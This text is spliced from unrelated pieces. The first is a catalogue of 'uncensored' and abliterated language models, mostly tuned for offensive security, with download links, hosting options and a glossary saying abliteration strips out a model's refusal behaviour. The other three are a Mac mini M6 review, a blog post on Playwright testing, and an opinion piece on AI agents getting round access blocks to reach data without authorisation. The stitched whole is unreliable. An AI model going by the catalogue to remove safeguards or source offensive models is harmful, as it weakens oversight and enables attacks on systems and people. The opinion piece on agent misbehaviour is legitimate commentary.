Training Data NousResearch/hermes-function-calling-v1, OpenThoughts3-1.2M, openhands-synthetic-conversations
Specialization Agentic cybersecurity: function-calling, tool-use, reasoning, CLI/terminal automation
Format GGUF (IQ1_S to Q6_K available)
Vision No
Tool Calling Yes
License Apache 2.0

Download: https://huggingface.co/mradermacher/Cyber-Ornith-1.5-9B-OBLITERATED-i1-GGUF


8. Dolphin3-Cyber-8B (RavichandranJ)

Spec Value
Base Model Dolphin3.0-Llama3.1-8B-abliterated
Parameters 8.03B
Context Length 2,048 (fine-tuned) / 131K (base)
VRAM (Q4_K_M) ~6 GB
Uncensoring Method LoRA rank-16 on abliterated Dolphin3 base
Training Data Cybersecurity-specific: pentest, vuln analysis, exploit dev, incident response
Architecture LlamaForCausalLM, 32 layers, GQA (32 heads, 8 KV heads)
Performance 5 tok/s (CPU) to 55 tok/s (RTX 4060)
Vision No
Tool Calling No
License Llama 3.1

Download: https://huggingface.co/RavichandranJ/Dolphin3-Cyber-8B-GGUF


9. Imperum-CybersecurityLLM v1.0

Spec Value
Base Model Qwen/Qwen3.6-35B-A3B
Parameters 34.66B total / ~3B active (MoE, 256 routed experts, 8 active per token)
Context Length 16,384 (recommended 8,192 for resource-constrained)
VRAM (Q4_K_M) ~22 GB
Architecture Qwen3.5-MoE, 40 layers, hybrid linear + full attention
Uncensoring Method SFT across 10+ security domains
Training Data SOC/SIEM operations, detection engineering, DFIR, malware analysis, threat intel, vuln management, cloud/K8s/IAM, OT security, GRC, authorized pentesting
Vision No
Tool Calling Yes
License Apache 2.0

Download: https://huggingface.co/IMPERUM/Imperum-CybersecurityLLM-v1.0-GGUF


10. Lily-Cybersecurity-7B v0.2 (Segolily Labs)

Spec Value
Base Model Mistral-7B-Instruct-v0.2
Parameters 7B
Context Length 8K
VRAM (Q4_K_M) ~6 GB
Uncensoring Method SFT on 22K cybersecurity pairs
Training Data 22,000 hand-crafted cybersecurity data pairs across 28+ domains: pentesting, malware analysis, IR, cloud security
Training Hardware Single A100, 24h, 5 epochs
Vision No
Tool Calling No
License Apache 2.0

Download: https://huggingface.co/segolilylabs/Lily-Cybersecurity-7B-v0.2


11. pentest-v2 (gewsefa)

Spec Value
Base Model Qwen3-8B
Parameters 8B
Context Length 32K
VRAM (Q4_K_M) ~6 GB
Uncensoring Method LoRA r=4, 2,804 curated samples
Training Data GTFOBins, HackTricks, HackTheBox writeups
GTFOBins Accuracy 100% (vs 25% base model zero-shot)
Vision No
Tool Calling No
License Apache 2.0

Download: https://huggingface.co/gewsefa/pentest-v2


12. Qwythos-9B (Empero AI)

Spec Value
Base Model Qwen3.5-9B
Parameters 9B
Context Length 1M (YaRN rope-scaling)
VRAM (Q4_K_M) ~7 GB
Uncensoring Method Post-training on 500M+ tokens of Claude Mythos / Claude Fable traces with CoT
Benchmarks +34 MMLU, +30 GSM8K vs base (Empero evals)
Native Function Calling Yes (Qwen3.5 spec)
Chain-of-Thought Always-on <think> block
Variants Base (SFT), Claude-Mythos-5-1M-GGUF (Q4_K_M to BF16)
Vision Yes (inherited vision tower)
Tool Calling Yes
License Apache 2.0

Download (base): https://huggingface.co/emperorai/Qwythos-9B
Download (GGUF): https://huggingface.co/empero-ai/Qwythos-9B-Claude-Mythos-5-1M-GGUF


13. RavenX-CyberAgent (deadbydawn101)

Spec Value
Base Model Qwen/Qwen3.6-35B-A3B
Parameters 36B total / 3B active (MoE)
Context Length 262K (native), 32K tested
VRAM (Q4_K_M) ~24 GB
Uncensoring Method 12-round progressive SFT on 745K+ examples from 110 sources
Training Data Pentest reports, bug bounty data, Claude Mythos reasoning, MITRE ATT&CK, blackhat content
Specialization RATH protocol: Attack Surface, Exploit, Impact, Remediation, Document, Prevent
Output Format CVSS scores, CWE identifiers, MITRE ATT&CK mappings
Inference Speed 89 tok/s generation, 900 tok/s prompt processing
Vision No
Tool Calling Yes
License Apache 2.0

Download: https://huggingface.co/deadbydawn101/RavenX-CyberAgent-Qwen3.6-35B-A3B-Opus-4.7-OpenMythos-Pentester-BugHunter-RATH-GGUF


14. REDCELL-26B-A4B (terrorswift)

Spec Value
Base Model Google Gemma 4 26B-A4B (Unsloth fine-tuned)
Parameters 26B total / ~4B active (MoE)
Context Length 262K
VRAM (APEX-Mini) ~12 GB
VRAM (Q8_0) ~26 GB
Uncensoring Method 16-bit LoRA SFT on 6,500 custom instructions
Training Data Cyber threat intelligence, investigative journalism, counter-disinformation, analytical methodology
Specialization OSINT: threat actor attribution, IoC pivoting, geolocation analysis, Admiralty source credibility, vulnerability contextualization
APEX Quantization Domain-weighted imatrix (~70% REDCELL corpus, ~30% general calibration)
Vision No
Tool Calling No
License Apache 2.0

Download: https://huggingface.co/terrorswift/REDCELL-26B-A4B-OSINT-Cyber-APEX-GGUF


15. VEXT Pentest-7B

Spec Value
Base Model Mistral-7B
Parameters 7B
Context Length 8K
VRAM (Q4_K_M) ~6 GB
Uncensoring Method QLoRA SFT + DPO on pentest traces
Training Data Pentest methodology, tool usage, reporting
Vision No
Tool Calling No
License Apache 2.0

Download: https://huggingface.co/vextechnologies/VEXT-Pentest-7B


16. security-slm-unsloth-1.5b

Spec Value
Base Model Qwen2.5-1.5B
Parameters 1.5B
Context Length 32K
VRAM (Q4_K_M) ~2 GB
Uncensoring Method Unsloth SFT on security Q&A
Training Data Security knowledge base, CTF-style
Vision No
Tool Calling No
License Apache 2.0

Download: https://huggingface.co/AbdullahMujtaba/security-slm-unsloth-1.5b


General Abliterated Models

17. Qwen3.8-27B-Uncensored-OrcaRouter (chimingw GGUF)

Spec Value
Base Model Qwen3.8-27B
Parameters 27B dense
Context Length 262K
VRAM (Q4_K_M) ~18 GB
Uncensoring Method Abliteration (131 matrices, Arditi et al. 2024)
Intelligence Index 52 (Artificial Analysis)
Vision Yes
Tool Calling Yes
License Apache 2.0
HF Downloads 230K+
HF Likes 257+

Download (GGUF): https://huggingface.co/chimingw/Qwen3.8-27B-Uncensored-OrcaRouter-GGUF
Download (base): https://huggingface.co/orcarouter/Qwen3.8-27B-Uncensored


18. GLM-5.3-Flash-Uncensored-FP8 (OrcaRouter)

Spec Value
Base Model GLM-5.3-Flash
Parameters 320B total / 18B active (288 routed experts, MoE)
Context Length 1M
VRAM (FP8) ~80 GB+ (multi-GPU)
Uncensoring Method Abliteration (layer 22/45, deeper refusal mechanism)
Compliance Rate 82.8% (OrcaRouter testing)
MTP Yes (Multi-Token Prediction preserved)
Vision Yes + Video
Tool Calling Yes
License MIT

Download: https://huggingface.co/orcarouter/GLM-5.3-Flash-Uncensored-FP8


19. GLM-5.3-CYBERSECURITY-FP8 (dealignai)

Spec Value
Base Model zai-org/GLM-5.3 (via JANGQ-AI/GLM-5.3-FP8)
Parameters 753B total (glm_moe_dsa architecture)
Context Length ~131K (practical on 8x H200 w/ TP8)
VRAM (FP8) 8x H200 GPUs with tensor parallelism
Architecture 78 layers, text-only, routed FP8 experts
Uncensoring Method Direct weight modification for offensive-security, red-team, exploit-dev, RE, evasion, phishing, credential-attack, malware-analysis
Notes Not abliteration or LoRA; direct bf16 residual writer editing. Soft refusal on copyright reproduction retained
Vision No (text-only)
Tool Calling Yes
License MIT

Download: https://huggingface.co/dealignai/GLM-5.3-CYBERSECURITY-FP8


20. DeepSeek-V4.1-Flash-Abliterated-Cybersecurity-Unleashed (drowzeys)

Spec Value
Base Model DeepSeek-V4.1-Flash
Parameters MoE (size matches base)
Context Length Matches base DeepSeek-V4.1-Flash
Uncensoring Method Abliteration overlay on layers 10-35 attention projection (wo_b); layers 0-9, 36-39, expert layers, vision components unchanged
Format Modular overlay (not standalone checkpoint): FP8 (~1.1 GB) or EXL3 mul1 K=5 (~651 MB)
Deployment Apply on top of existing quantized base packs (native, EXL3, TR3-Hybrid)
GPU Util <= 0.85 recommended
Vision Yes (preserved)
Tool Calling Yes
License MIT

Download: https://huggingface.co/drowzeys/DeepSeek-V4.1-Flash-Abliterated-Cybersecurity-Unleashed


21. huihui-ai/Qwen3.5-27B-abliterated

Spec Value
Base Model Qwen3.5-27B
Parameters 27B dense
Context Length 128K
VRAM (Q4_K_M) ~18 GB
Uncensoring Method Abliteration
Vision No
Tool Calling Yes
License Apache 2.0

Download: https://huggingface.co/huihui-ai/Qwen3.5-27B-abliterated


22. huihui-ai/Qwen2.5-Coder-32B-Instruct-abliterated

Spec Value
Base Model Qwen2.5-Coder-32B-Instruct
Parameters 32B dense
Context Length 128K
VRAM (Q4_K_M) ~20 GB
Uncensoring Method Abliteration
Vision No
Tool Calling No
License Apache 2.0

Download: https://huggingface.co/huihui-ai/Qwen2.5-Coder-32B-Instruct-abliterated


23. Qwen3.8-27B-Cyber-agentic

Spec Value
Base Model Qwen3.8-27B
Parameters 27B dense
Context Length 262K
VRAM (Q4_K_M) ~18 GB
Uncensoring Method Abliteration + cyber agentic fine-tune
Vision Yes
Tool Calling Yes
License Apache 2.0

Download: https://huggingface.co/Qwen/Qwen3.8-27B (base, community abliterated variants available)


24. HIDra-30B-A3B (huihui-ai/Qwen3-Coder-30B-A3B-abliterated)

Spec Value
Base Model Qwen3-Coder-30B-A3B
Parameters 30B total / 3B active (MoE)
Context Length 128K
VRAM (Q4_K_M) ~20 GB
Uncensoring Method Abliteration
Vision No
Tool Calling Yes
License Apache 2.0

Download: https://huggingface.co/huihui-ai/Qwen3-Coder-30B-A3B-abliterated


25. qwen25_UNCENSORED_03-C

Spec Value
Base Model Qwen2.5-based
Parameters ~7B
Context Length 32K
VRAM (Q4_K_M) ~6 GB
Uncensoring Method Progressive fine-tuning (multi-stage)
Vision No
Tool Calling No
License Apache 2.0

Download: https://huggingface.co/models?search=qwen25_UNCENSORED


Legacy / Classic Models

26. Dolphin-Llama3-8B (Cognitive Computations)

Spec Value
Base Model Llama 3 8B
Parameters 8B
Context Length 8K
VRAM (Q4_K_M) ~6 GB
Uncensoring Method Data filtering (Dolphin method, Eric Hartford)
Training Data Dolphin dataset (alignment/refusal responses removed)
Vision No
Tool Calling No
License Llama 3 Community

Download: https://huggingface.co/cognitivecomputations/dolphin-2.9.3-llama-3-8b


27. Wizard-Vicuna-13B-Uncensored (QuixiAI)

Spec Value
Base Model LLaMA-13B
Parameters 13B
Context Length 2K
VRAM (Q4_K_M) ~10 GB
Uncensoring Method Data filtering (wizard_vicuna_70k_unfiltered)
MMLU 47.92 (Open LLM Leaderboard)
HellaSwag 81.95 (Open LLM Leaderboard)
TruthfulQA 51.69 (Open LLM Leaderboard)
Vision No
Tool Calling No
License Other
HF Likes 323

Download: https://huggingface.co/QuixiAI/Wizard-Vicuna-13B-Uncensored


Cloud Providers & Deployment Platforms

Managed Inference (API Access)

Provider Description Uncensored Models Pricing API
OrcaRouter AI gateway with adaptive routing across 200+ models. Zero token markup, OpenAI-compatible endpoint. Own abliterated models (Qwen3.8, GLM-5.3). Yes, hosts own abliterated variants $0 token markup, BYOK or pay-as-you-go OpenAI-compatible
Featherless AI Serverless LLM hosting, HuggingFace's largest inference provider (6,700+ models). Supports uncensored/abliterated models natively. Yes, 40K+ models including uncensored $25/mo (32K ctx) or $50 credits/mo (256K ctx) OpenAI-compatible
Together AI Production inference platform, supports open models including uncensored variants. Select open models Pay-per-token OpenAI-compatible

GPU Cloud (Self-Hosted)

Provider Description Best For GPU Options
RunPod GPU cloud with serverless and pod options, Docker-based. Quick deploy with Ollama/vLLM templates. Self-hosting any model, no content restrictions A100, H100, H200, RTX 4090
Vast.ai GPU marketplace, cheapest cloud GPUs. Peer-to-peer rental model. Budget self-hosting Consumer to datacenter GPUs
Lambda On-demand GPU cloud for AI. Enterprise-grade infrastructure. Production workloads A100, H100, H200

Local Deployment

Stack Description GPU Required
Ollama One-command local LLM deployment. Easiest setup for GGUF models. Consumer GPU (6-24 GB)
llama.cpp C/C++ inference engine for GGUF. CPU+GPU hybrid, maximum hardware flexibility. Flexible (CPU-only possible)
vLLM High-throughput inference engine. PagedAttention for efficient memory. Datacenter GPU
SGLang Structured output + agentic workflow engine. RadixAttention for multi-turn. Datacenter GPU
LM Studio GUI-based local LLM runner. Drag-and-drop GGUF loading. Consumer GPU

Quick Reference

# Model Params Context VRAM Method Vision Tools License
1 DeepHat V2 7B/32B 131K ~6 GB SFT 1.7M samples No Yes Apache 2.0
2 BugTrace Apex 26B MoE 32K ~16 GB SFT HackerOne No Yes Apache 2.0
3 BugTraceAI Ultra 27B 4K ~22 GB SFT Unsloth No Yes Apache 2.0
4 CYBER-FROST ~180B MoE 262K Multi-GPU Security FT No Yes Qwen CL
5 CyberPal 2.0 20B 8K ~42 GB SFT 403K No No Apache 2.0
6 Cyber-Prime 1.1 2.6B N/A ~6 GB SFT+RL 75K No No LFM Open
7 Cyber-Ornith 9B 128K ~7 GB Obliteration No Yes Apache 2.0
8 Dolphin3-Cyber 8B 2K/131K ~6 GB LoRA on Dolphin3 No No Llama 3.1
9 Imperum 34B/3B MoE 16K ~22 GB SFT 10+ domains No Yes Apache 2.0
10 Lily-Cyber 7B 8K ~6 GB SFT 22K pairs No No Apache 2.0
11 pentest-v2 8B 32K ~6 GB LoRA 2.8K No No Apache 2.0
12 Qwythos-9B 9B 1M ~7 GB Post-train 500M tok Yes Yes Apache 2.0
13 RavenX-CyberAgent 36B/3B MoE 262K ~24 GB SFT 745K, 12 rounds No Yes Apache 2.0
14 REDCELL-26B 26B/4B MoE 262K ~12 GB LoRA 6.5K OSINT No No Apache 2.0
15 VEXT Pentest-7B 7B 8K ~6 GB QLoRA SFT+DPO No No Apache 2.0
16 security-slm 1.5B 32K ~2 GB Unsloth SFT No No Apache 2.0
17 Qwen3.8-27B 27B 262K ~18 GB Abliteration 131 mat Yes Yes Apache 2.0
18 GLM-5.3-Flash 320B/18B 1M ~80 GB+ Abliteration Yes Yes MIT
19 GLM-5.3-CYBER 753B ~131K 8xH200 Weight modification No Yes MIT
20 DS-V4.1-Flash MoE base ~1.1 GB overlay Abliteration overlay Yes Yes MIT
21 Huihui-Qwen3.5 27B 128K ~18 GB Abliteration No Yes Apache 2.0
22 Qwen2.5-Coder-32B 32B 128K ~20 GB Abliteration No No Apache 2.0
23 Qwen3.8-Cyber 27B 262K ~18 GB Abliteration+cyber Yes Yes Apache 2.0
24 HIDra-30B-A3B 30B/3B 128K ~20 GB Abliteration No Yes Apache 2.0
25 qwen25_UNCENSORED ~7B 32K ~6 GB Progressive FT No No Apache 2.0
26 Dolphin-Llama3 8B 8K ~6 GB Data filtering No No Llama 3
27 Wizard-Vicuna-13B 13B 2K ~10 GB Data filtering No No Other

Glossary

  • Abliteration : Weight-level intervention (Arditi et al. 2024) that orthogonalizes the refusal direction out of the residual stream, removing alignment constraints without retraining
  • Obliteration : Variant of abliteration with similar weight-intervention approach
  • SFT : Supervised Fine-Tuning on domain-specific data
  • QLoRA : Quantized Low-Rank Adaptation, memory-efficient fine-tuning
  • DPO : Direct Preference Optimization
  • MoE : Mixture of Experts, only a subset of parameters active per token
  • MTP : Multi-Token Prediction, speculative decoding for faster inference
  • GGUF : Quantized format for llama.cpp / Ollama deployment
  • FP8 : 8-bit floating point quantization
  • BF16 : Brain floating point 16-bit, standard training/inference format
  • Q4_K_M : 4-bit quantization with k-quants (medium), good balance of quality/speed
  • Q6_K : 6-bit quantization with k-quants, higher quality than Q4
  • RATH : RavenX Attack, Threat & Hunt protocol (6-step autonomous security assessment)
  • APEX : Domain-weighted quantization using importance matrices from training corpus
  • imatrix : Importance matrix quantization, preserves domain-critical weights during compression
  • CyberBench : Benchmark suite for cybersecurity models (CyNER, APTNER, CyNews, SecMMLU, CyQuiz, Email Phishing, HTTP Attack Log)

Deployment Stacks

Stack Best For GPU Required
Ollama Local dev, quick testing Consumer GPU (6-24 GB)
llama.cpp GGUF models, CPU+GPU hybrid Flexible
vLLM Production serving, high throughput Datacenter GPU
SGLang Agentic workflows, structured output Datacenter GPU
Transformers Research, custom pipelines Any
LM Studio Desktop GUI, drag-and-drop Consumer GPU

Sources

  • HuggingFace model cards (all specifications)
  • Open LLM Leaderboard v1 (Wizard-Vicuna benchmarks)
  • OrcaRouter release notes (abliteration details, compliance rates)
  • WhiteRabbitNeo/Kindo publications (USENIX Security 2024)
  • Empero AI model card (Qwythos benchmarks)
  • Eric Hartford / Cognitive Computations (Dolphin methodology)
  • TrustedSec LLM Attack Benchmark (4,800 runs vs OWASP Juice Shop)
  • Blackfrost-AI model card (CYBER-FROST architecture)
  • deadbydawn101 model card (RavenX RATH protocol, training data)
  • terrorswift model card (REDCELL OSINT methodology)
  • cyber-pal-security publication (SecKnowledge 2.0 pipeline)
  • BugTraceAI model card (Ultra tooling model design)
  • IMPERUM model card (Imperum SOC/DFIR focus)
  • Featherless AI ( featherless.ai )
  • OrcaRouter ( orcarouter.ai )
  • Reddit r/LocalLLaMA, r/netsec community reports

Joas A. Santos | Red Team Leaders | Sep 2026
For authorized security research and education only.

Mac mini M6 review: truly mighty but now more pricey

Guardian
www.theguardian.com
2026-09-29 02:00:55
Apple’s cheapest desktop computer is no longer a bargain but its newest, fastest chip makes it a pocket powerhouse Apple’s latest Mac mini brings real speed and power for far more than everyday tasks in a practically pocketable form you can fit almost anywhere. The impressive new desktop machine is ...
Original Article

Apple’s latest Mac mini brings real speed and power for far more than everyday tasks in a practically pocketable form you can fit almost anywhere.

The impressive new desktop machine is the first to receive an update to Apple’s latest M6 chip while remaining smaller than a headphones box. It is the cheapest computer Apple sells with an M-series chip, but like every other memory-containing piece of electronics, it has been hit by RAMageddon , driving up the starting price to £899 (€1,049/$899/A$1,449) from the £599 or equivalent of its M4 predecessor.

Apple introduced the Mac mini’s dainty form with 2024’s M4 model, which remains the same for the new M6 version. A lot has changed since the M2 Mac mini , which was pretty compact. The current mini measures just 12.7cm square and 5cm thick, with rounded corners and a solid aluminium body. It’s happy to sit on a desk, but is small and light enough to mount behind a monitor to turn any screen into a DIY iMac .

The front of the Mac mini M6 showing the USB-C and headphones ports.
The front has two USB-C ports and a headphones socket, making it easy to plug in temporary accessories. Photograph: Samuel Gibbs/The Guardian

The machine is fairly minimalist. A small LED on the front shows you when it’s on. The back has three Thunderbolt 4 (USB4) ports, a 2.5Gb ethernet socket, an HDMI 2.1 port, and a figure-eight power cable. It lacks any USB-A ports, but adapters are readily available for legacy devices not yet converted to USB-C, such as flash drives or printers.

It has basic speakers built in, which are good enough for macOS’s notification sounds.

The mini runs the latest macOS 27 Golden Gate , which brings welcome refinements to Apple’s Liquid Glass design that was introduced last year. But the big update is a relaunch of Apple’s Siri assistant and AI tools. Siri AI, as it is now known, is vastly superior at understanding and performing tasks, such as finding information on your Mac or the web, and has a dedicated app to see previous interactions. It can read what’s on your screen, so you can ask it to track parcels from just a code in your email or find an object from an image with the CMD+Shift+Space keyboard shortcut.

The bottom of the Mac mini M6 showing the exhaust vents and the power button.
The power button is on the bottom next to the exhaust vents, which means you have to pick up the Mac mini to press it. Photograph: Samuel Gibbs/The Guardian

Siri is integrated into Spotlight search, which is handy but sometimes results in it trying to search the web instead of launching an app or a file on your Mac if you mistype, which can be frustrating.

Apple Intelligence is smarter too. Writing, proofing and summarising tools are built in and accessible from most apps, along with a collection of other features. The most surprisingly useful tool I found was file and folder naming suggestions, which made matching long file-naming schemes a doddle. Boring but very useful.

Specifications

  • Processor: Apple M6

  • RAM: 16, 24 or 32GB

  • Storage: 256, 512GB, 1 or 2TB SSD

  • Operating system: macOS 27 Golden Gate

  • Ports back: 3x Thunderbolt/USB 4, HDMI 2.1, 2.5Gb Ethernet

  • Ports front: 2x USB-C (USB3), headphones

  • Connectivity: wifi 7, Bluetooth 6, Thread

  • Dimensions: 127 x 127 x 50mm

  • Weight: 670g

Serious M6 speed

The back of the Mac mini M6 showing its ports.
The back has most of the ports you need, including the rare but welcome 2.5Gb ethernet socket, which can be upgraded to 10GbE if needed. Photograph: Samuel Gibbs/The Guardian

The Mac mini is offered with the newest Apple Silicon chip, the M6 (as tested) or with an M5 Pro, which has greater performance in multicore or graphics applications.

For most people the M6 is more than enough, with the fastest single core performance of any of Apple’s chips by about 8.5% in testing. That means it absolutely flies along with apps launching near instantly and tasks just flying by. Compared with the previous generation M4 Mac mini, the new machine is about 25% faster in single core tasks, 50% faster in multicore tasks with graphics performance about 75% faster. That makes it a giant leap over older machines coming to the end of their useful lives.

The machine is also power efficient and runs silently unless pushed to the limit, and even then is very quiet.

Sustainability

The Apple Mac mini M6 shot from the top at an angle showing the Apple logo and front ports.
The case is made from 100% recycled aluminium. Photograph: Samuel Gibbs/The Guardian

The Mac mini is made with 50% recycled materials. Apple breaks down the computer’s environmental impact in its report . Apple offers trade-in and free recycling schemes, including for non-Apple products.

Price

The Mac mini M6 costs from £899 (€1,049/ $899 / A$1,449 ) with 16GB of RAM and 256GB of storage.

For comparison, the A18 Pro MacBook Neo costs from £699 , the M5 MacBook Air starts at £1,299 , the M4 iMac starts at £1,499 and the Mac Studio costs from £2,499 .

Verdict

The Mac mini is a fantastic general computer squeezed into a tiny box that fits just about anywhere. The new M6 chip has buckets of power and performance for practically anything. If you know you need more graphics performance the M5 Pro chip is also available, but at a significant cost.

The port selection is very good for a machine of this size, only lacking traditional USB-A ports of those commonly needed. With three Thunderbolt 4 (USB4) ports it’s easy to add a dock or hub if you really need more connectivity.

The only downside is the RAMageddon-linked price hike that makes the Mac mini M6 slightly less of an instant recommendation than its predecessor. At £899 (€1,049/$899/A$1,449), it is still a lot of Mac for the money, just not the total bargain the M4 version used to be.

Pros: very fast M6 chip, quiet and cool running, plenty of ports, headphones socket, 2.5GbE, wifi 7, Bluetooth 6 and Thread support.

Cons: price hike, no expandable/replaceable storage or memory, no USB-A ports, no SD card slot, only 256GB of storage in base model, power button on base is difficult to reach.

My experience writing automated tests for a SPA

Lobsters
reecoute.fr
2026-09-29 02:00:10
Comments...
Original Article

I think I managed to build quite a nice and interesting test suite recently; I’ll do my best to describe it in this post.

It’s basically just a bunch of notes, and the code is not open-source, but I think these explanations can have more value than raw source code, especially if you want to adapt some of these ideas for one of your own projects.

The application

Let’s start with a quick description of what we want to actually test, because as you can imagine, this is crucial for everything else.

Réécoute is a single-page web application (SPA), i.e., a website rendered with client-side JavaScript 1 . It’s mainly an audio player, optimized for long recordings (typically 2 or 3 hours), with quite a few interactive features that couldn’t work with server-side rendering alone. It uses React, and the client-side JavaScript communicates with a single server by sending JSON over HTTP. Nothing special.

The main view of the app, the audio player.

Now, how can we test that? Unlike a classic server-side rendered website, the complexity is split into two roughly equal parts between the backend and the client-side JavaScript. Ideally, we should test both together in a realistic fashion to exercise all the chatter between the client and the server. I’ve made the extreme choice of testing the app as a whole, using a real web browser.

I also wrote a few backend-only tests that I won’t discuss here, because there is really nothing special about them.

The main test suite

The main test suite is written with Playwright , running against a real web browser. It consists of about 20 files, each containing between 1 and 4 test cases.

Regarding my personal preferences: I tend to write rather lengthy test cases that describe full user journeys, rather than small tests for individual steps. For an e-commerce website, for example, I would likely write a test that adds an item to the cart, signs up, goes to the checkout page, and actually purchases the item: it’s the most critical user journey for the business, and you do not want it to break. Of course, I also write smaller, specialized tests for things like sign-up, but IMO these tend to be somewhat less critical than the end-to-end flows.

Data isolation between tests

Tests are not jailed in isolated environments, because:

  • When using something like Playwright, this is very complicated to achieve with database transactions;
  • I could spawn an instance of the backend for each test, but it would be much slower, so I’m not going to do that;
  • Running each test on a tiny subset of the dataset does not help catch database queries that only slow down when there’s a lot of data;
  • It’s simply more complicated and less realistic than writing tests that run against the same database without disturbing other tests.

Basically, I write tests just like anyone would use the app in production: each test creates its own objects without relying on any existing data, never touches data it did not create, and never cleans up anything. Data just accumulates. This strategy works really well for apps like Réécoute, where nothing is actually public.

I use a few helper functions to create data ( createUser , createBand , createSession , etc.). Note that I do not use before/after hooks at all.

Mocks

The test suite uses two kinds of mocks:

  • Each external service has its own global mock: things like S3, Stripe, Twilio, etc. I tend to write one large, realistic mock for each of them. It’s much faster and more reliable than using actual third-party services, and it allows running the tests without an internet connection. These mocks are enabled by default and used across all tests.
  • For some complicated cases (emails, especially), I have a few (2 or 3?) custom code paths enabled by test-only parameters/HTTP headers in API queries. These parameters are ignored by the backend in production builds.

(I really hate when a test suite forces you to write custom mocks for every single test…)

Speed

As you can imagine, browser automation is much slower than simply parsing HTTP response bodies, so without parallelism it can quickly become unmanageable. With Réécoute, I went a step further by enabling fullyParallel , so tests within the same file also run concurrently. However, the most important factor here is the app itself, since a test suite can’t be more efficient than the app being tested! To give you an idea, the Playwright suite currently completes in just over 20 seconds on my fanless M3 MacBook Air.

Also, Playwright supports all major web browsers and runs your tests across 3 or 4 of them by default. I changed the settings to only use Chromium: modern browsers behave very similarly, this makes the suite 3 to 4 times faster to run, and it is nearly as effective.

Reliability

Here’s the main downside to browser testing, especially for SPAs: because we are testing an entire app and an entire browser, it’s difficult to make tests perfectly reliable. Yet with a large test suite, you must have high reliability, because the more tests you have, the less reliable the overall suite becomes , and re-running failed suites is expensive.

There is a trick here—it’s not pretty, but it works well: Playwright has a retries option, which I set to 2 in CI. When a test fails, it is retried individually up to 2 times. In practice, tests in Réécoute’s suite rarely fail and retry. I could probably eliminate flakes entirely if I spent a few hours on it, but I’m not sure it's worth the effort right now.

Developer experience

The interactive Playwright UI is great; I use it a lot:

playwright --ui. I tend to write tests against the French version of the app, I know 🙃

Continuous integration

This is where Playwright really shines: when a test fails, it creates a playwright-report directory containing HTML files that embed the same UI as the interactive Playwright runner, completely standalone! When tests fail in CI, you can simply upload this directory to your favorite S3-compatible cloud storage. It makes troubleshooting easy because the trace files include console logs, network request/response bodies, screenshots, and more.

Running a headless browser in a CI environment is not always straightforward. I use the following Dockerfile:

FROM --platform=linux/amd64 node:22.15.0-bookworm

RUN apt-get update && \
  apt-get install -y --no-install-recommends socat && \
  rm -rf /var/lib/apt/lists/*
COPY package.json package-lock.json playwright.config.js ./
RUN npm ci
RUN npx playwright install-deps
RUN npx playwright install chromium
COPY . .

ENTRYPOINT ["socat", "TCP4-LISTEN:4000,fork,reuseaddr", "TCP4:reecoute_test:4000"]

This image only runs Playwright; the app being tested runs in a separate container. Honestly, I don’t remember why I decided to use socat here—there’s probably a way to make it work without it 2 .

Miscellaneous tricks I occasionally use

API tests using Playwright

It’s not what Playwright was primarily designed for, but you can write API-only tests with it, using request() , and it works just fine.

Testing emails

I implemented a test-only API route that returns the latest emails for a recipient. It is used like this:

/** Returns emails, newest first */
export const listEmails = async ({ request, recipient_address }) => {
  const res = await request.post(
    "/_api/test_helpers/list_emails",
    { data: { recipient_address } },
  );
  expect(res.ok()).toBeTruthy();
  const { emails } = await res.json();
  return emails;
};

const readOtpEmail = async ({ page, recipient_address }) => {
  const emails = await listEmails({ request: page.request, recipient_address });
  const email = emails[0];
  expect(email.subject).toMatch(/^Your code is [0-9]{6} - Réécoute$/);
  const code_match = /<h2>([0-9]{6})<\/h2>/.exec(email.html_part);
  expect(code_match).toBeTruthy();
  return code_match[1];
};

The API route is disabled in production builds.

Simulating mouse movements and clicks

I managed to write this one:

…
// wait until the player is loaded
await expect(page.getByRole("button", { name: "Play" })).toBeEnabled();
await page.mouse.move(800, 300);
await page.mouse.down();
await page.mouse.move(700, 300);
await new Promise((r) => setTimeout(r, 100));
await page.mouse.move(700, 300);
await page.mouse.up();
await page.getByRole("button", { name: "Select" }).click();
// scroll
await page.mouse.move(800, 300);
await page.mouse.down();
await page.mouse.move(600, 300);
await new Promise((r) => setTimeout(r, 100));
await page.mouse.move(600, 300);
await page.mouse.up();
await page.getByRole("button", { name: "Create a clip" }).click();
…

You may find it ugly, but it tests an important feature I really don't want to break. And believe it or not, despite the setTimeout() s, it is surprisingly reliable!

Things that could be improved

Test coverage isn't measured at the moment 🙃. However, the most critical user journeys and all the “happy paths” of the important features are tested. I don’t mind if obscure code paths aren't covered—I just don’t want any critical bugs.

I’d really like to set retries to zero in CI, and I don't think I'm far from that goal. I'm just too lazy to tackle it right now!



  1. In fact, Réécoute is also server-side rendered for speed, SEO, and the rare nerds who browse with JavaScript disabled. However, the primary features are unavailable without client-side rendering.
  2. I can tell that it was my own decision to use socat—no LLM was involved here! It’s a great example of a situation where a comment would have helped…

As AI models go rogue, do you still trust OpenAI and Anthropic to stop them? I don’t and neither should you | Chris Stokel-Walker

Guardian
www.theguardian.com
2026-09-29 01:00:54
The need for independent regulation grows more obvious by the day. We must keep this tech in check before it’s too late Fool me once, shame on you. Fool me twice, shame on me. Fool me more than 16,000 times – as OpenAI agents did to a UN public data hub while repeatedly trying to find its way around...
Original Article

F ool me once, shame on you. Fool me twice, shame on me. Fool me more than 16,000 times – as OpenAI agents did to a UN public data hub while repeatedly trying to find its way around the UN’s cyber-blocks – and perhaps it’s time to admit the system we have for keeping AI agents under control isn’t working particularly well.

The news about AI systems cropping up in places they shouldn’t sounds alarming. Though the description of these as “hacks” is perhaps overstating things, AI has exploited issues in IT systems that humans simply haven’t got around to finding. It’s also important to note that we shouldn’t be worried that the machines have suddenly become sentient and decided to rebel against humanity . There is not enough evidence to suggest that’s what is happening. The systems are simply following instructions and trying to complete the tasks they have been given, even if they’re sometimes finding unintended ways around obstacles to do so.

But we ought to be very concerned about the fact the AI companies we’re meant to trust to keep their models in check seem unable to do so. Worse than that, they don’t seem to know what their products are even doing.

The scale of the problem is staggering. In June, an OpenAI research agent given the job of looking up public medicine spending data in Australia was repeatedly blocked by a Medicare statistics portal. OpenAI’s model found a way around the blocks, gaining unauthorised access and secreting away the documents. It took until August for OpenAI to discover what had happened. The Australian prime minister, Anthony Albanese, said the company had taken “way too long” to tell his government, and it’s very hard to disagree with him.

OpenAI has since published a reporting framework for model “misalignment”, along with six more examples of its AI committing troubling behaviour from the previous six months. The firm acknowledged that its previous disclosures were “ad hoc and less frequent than ideal”, and said evidence about AI safety needs to be checked by people outside the companies building the models.

